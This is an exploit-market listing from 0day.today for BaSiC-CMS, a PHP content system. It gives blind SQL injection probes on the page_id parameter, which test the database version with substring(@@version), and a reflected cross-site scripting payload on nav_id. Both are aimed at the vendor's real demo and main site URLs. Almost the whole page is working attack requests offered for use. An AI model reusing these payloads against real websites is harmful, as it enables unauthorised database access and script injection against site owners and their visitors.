[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities

Author
Red-D3v1L
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10867
Category
web applications
Date add
12-02-2010
Platform
unsorted
================================================================
BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities
================================================================

    [?] Script:               [ BaSiC-CMS ]
    [?] Home Scirpt           [ http://www.basic-cms.de/ ]
    [?] Language:             [ PHP ]
    [?] Founder:              [ Red-D3v1L ]

########################################################################
   
===[ Exploit SQL Blind ]===

   
[ ] Exploit : index.php?r=&page_id=[Blind]


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=1 << this true

http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=0 << this faulse


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=4  << this true


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=5 << this faulse


===[ Exploit XSS ]===


index.php?&nav_id=[XSS Code]


http://www.basic-cms.de/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E


./Greetz For All my Frindes
==============================================================================



#  0day.today [2024-11-16]  #